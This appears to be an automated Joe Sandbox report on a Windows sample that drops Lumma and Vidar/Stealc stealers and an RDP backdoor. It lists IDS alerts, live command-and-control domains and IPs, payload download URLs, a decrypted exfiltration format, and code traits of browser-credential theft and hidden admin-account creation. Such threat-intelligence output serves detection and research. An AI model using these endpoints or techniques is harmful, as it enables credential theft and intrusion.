2024-09-27T00:29:10.906459+0200	2049836	1	A Network Trojan was detected	192.168.2.6	57910	188.114.97.3	443	TCP
2024-09-27T00:29:11.891502+0200	2049836	1	A Network Trojan was detected	192.168.2.6	57912	172.67.162.108	443	TCP
2024-09-27T00:29:12.953361+0200	2049836	1	A Network Trojan was detected	192.168.2.6	57914	188.114.97.3	443	TCP
2024-09-27T00:29:13.915740+0200	2049836	1	A Network Trojan was detected	192.168.2.6	57916	188.114.97.3	443	TCP
2024-09-27T00:29:15.087760+0200	2049836	1	A Network Trojan was detected	192.168.2.6	57917	104.21.77.130	443	TCP
2024-09-27T00:29:17.420415+0200	2049836	1	A Network Trojan was detected	192.168.2.6	57919	172.67.128.144	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:11.433352+0200	2056157	1	Domain Observed Used for C2 Detected	192.168.2.6	57912	172.67.162.108	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:12.466412+0200	2056155	1	Domain Observed Used for C2 Detected	192.168.2.6	57914	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:08.362064+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.6	57906	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:07.370769+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.6	57904	104.21.4.136	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:09.391861+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.6	57908	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:14.437520+0200	2056151	1	Domain Observed Used for C2 Detected	192.168.2.6	57917	104.21.77.130	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:13.451656+0200	2056153	1	Domain Observed Used for C2 Detected	192.168.2.6	57916	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:10.449927+0200	2056159	1	Domain Observed Used for C2 Detected	192.168.2.6	57910	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:06.400022+0200	2056177	1	Domain Observed Used for C2 Detected	192.168.2.6	57903	172.67.194.216	443	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:13.750357+0200	2054495	1	A Network Trojan was detected	192.168.2.6	57915	45.132.206.251	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:10.921550+0200	2056156	1	Domain Observed Used for C2 Detected	192.168.2.6	60424	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:11.953153+0200	2056154	1	Domain Observed Used for C2 Detected	192.168.2.6	63755	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:07.856404+0200	2056162	1	Domain Observed Used for C2 Detected	192.168.2.6	51828	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:06.877960+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.6	59417	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:08.834186+0200	2056160	1	Domain Observed Used for C2 Detected	192.168.2.6	50348	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:13.930018+0200	2056150	1	Domain Observed Used for C2 Detected	192.168.2.6	62300	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:12.956706+0200	2056152	1	Domain Observed Used for C2 Detected	192.168.2.6	61967	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:09.902627+0200	2056158	1	Domain Observed Used for C2 Detected	192.168.2.6	51250	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:05.908172+0200	2056176	1	Domain Observed Used for C2 Detected	192.168.2.6	59699	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:28:34.275365+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.6	57880	TCP
2024-09-27T00:29:52.096771+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.6	57929	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:28:35.644005+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.6	57881	TCP
2024-09-27T00:29:53.477239+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.6	57930	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:28:35.643996+0200	2049087	1	A Network Trojan was detected	192.168.2.6	57881	5.75.211.162	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:34.407536+0200	2803305	3	Unknown Traffic	192.168.2.6	57921	172.67.74.152	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:04.946721+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	57901	147.45.44.104	80	TCP
2024-09-27T00:29:07.364776+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	57901	147.45.44.104	80	TCP
2024-09-27T00:29:09.657271+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	57901	147.45.44.104	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220804http://147.45.44.104/prog/66f5db9e	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: reinforcenh.shop	Avira URL Cloud: Label: malware
Source: stogeneratmns.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/mozglue.dll	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/badges	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/freebl3.dll	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/api	Avira URL Cloud: Label: malware
Source: ghostreedmnu.shop	Avira URL Cloud: Label: malware
Source: wallkedsleeoi.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/F_	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/	Avira URL Cloud: Label: malware
Source: https://5.75.211.162	Avira URL Cloud: Label: malware
Source: https://t.me/ae5ed	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/B	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/C	Avira URL Cloud: Label: malware
Source: https://vozmeatillu.shop/api	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/;_	Avira URL Cloud: Label: malware
Source: fragnantbui.shop	Avira URL Cloud: Label: malware
Source: offensivedzvju.shop	Avira URL Cloud: Label: malware
Source: drawzhotdog.shop	Avira URL Cloud: Label: malware
Source: vozmeatillu.shop	Avira URL Cloud: Label: malware
Source: https://drawzhotdog.shop/api	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe	Avira URL Cloud: Label: malware
Source: https://gutterydhowi.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/msvcp140.dllh	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5de72d9ebd_rdp[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1311769
Source: C:\ProgramData\BKJKEBGDHD.exe	Avira: detection malicious, Label: HEUR/AGEN.1311769

Found malware configuration

Source: 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "4b74261d834413e886f920a1e9dc5b33"}
Source: 11.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["stogeneratmns.shop", "offensivedzvju.shop", "drawzhotdog.shop", "vozmeatillu.shop", "fragnantbui.shop", "ghostreedmnu.shop", "wallkedsleeoi.shop", "reinforcenh.shop", "gutterydhowi.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\RDP Wrapper\rdpwrap.dll	ReversingLabs: Detection: 54%
Source: C:\ProgramData\GIJEGDAKEH.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5db9e54794_vfkagks[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5de72d9ebd_rdp[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\BKJKEBGDHD.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wallkedsleeoi.shop
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	3_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C526C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6C526C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C67A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	3_2_6C67A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C674440 PK11_PrivDecrypt,	3_2_6C674440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C644420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	3_2_6C644420

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:57876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.6:57877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.194.216:443 -> 192.168.2.6:57903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:57904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:57908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57910 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:57912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.130:443 -> 192.168.2.6:57917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:57918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.6:57919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:57923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:57925 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.6:57926 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2987077823.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: c:\rje\tg\vlt\obj\Release\ojc.pdb source: 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr
Source:	Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_NamefullNameGetAdminGroupNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySystem.Security.CryptographyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyIsNullOrEmptygVexuh5UIe2gYxGhNy
Source:	Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: costura.costura.pdb.compressedlB source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\rje\tg\vea6\obj\Release\ojc.pdb source: file.exe
Source:	Binary string: costura.costura.pdb.compressed source: BKJKEBGDHD.exe, 0000000F.00000000.2789350400.0000000000AD2000.00000002.00000001.01000000.0000000C.sdmp, 66f5de72d9ebd_rdp[1].exe.3.dr
Source:	Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: RfxVmt.pdb source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2943594444.0000000038886000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2920076406.000000002C9A6000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2987077823.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: rdpclip.pdb source: RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3305375474.000000002050B000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\rje\tg\ps7uj1z\obj\Release\ojc.pdb source: GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: BKJKEBGDHD.exe, 0000000F.00000000.2789350400.0000000000AD2000.00000002.00000001.01000000.0000000C.sdmp, 66f5de72d9ebd_rdp[1].exe.3.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
